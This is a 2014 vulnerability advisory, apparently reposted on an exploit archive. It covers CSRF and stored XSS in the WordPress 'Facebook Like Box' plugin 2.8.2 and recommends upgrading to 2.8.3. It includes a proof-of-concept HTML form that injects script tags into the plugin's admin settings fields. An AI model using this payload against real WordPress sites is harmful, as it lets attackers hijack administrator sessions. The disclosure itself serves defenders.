Home / exploits WordPress Facebook Like Box 2.8.2 CSRF / XSS
Posted on 13 December 2014
Title: WordPress 'Facebook Like Box' plugin - CSRF/XSS Version: 2.8.2 Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/cardoza-facebook-like-box/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- Facebook Like Box is a social plugin that enables Facebook Page owners to attract and gain Likes from their own website. ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and echo'ed on the plugin's admin page. This allows an attacker to perform XSS through these fields. PoC: Log in to a vulnerable site and press submit on this form: <form method="POST" action="http://vuln.site/wp-admin/admin.php?page=slug_for_fb_like_box"> <input type="text" name="frm_title" value=""/><script>alert(1);</script>"><br /> <input type="text" name="frm_url" value=""/><script>alert(2);</script>"><br /> <input type="text" name="frm_border_color" value=""/><script>alert(3);</script>"><br /> <input type="text" name="frm_width" value=""/><script>alert(4);</script>"><br /> <input type="text" name="frm_height" value=""/><script>alert(5);</script>"><br /> <input type="text" name="frm_color_scheme" value="light"><br /> <input type="text" name="frm_show_faces" value="true"><br /> <input type="text" name="frm_stream" value="true"><br /> <input type="text" name="frm_header" value="true"><br /> <input type="text" name="frm_submit" value="Save"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- You should upgrade to version 2.8.3.
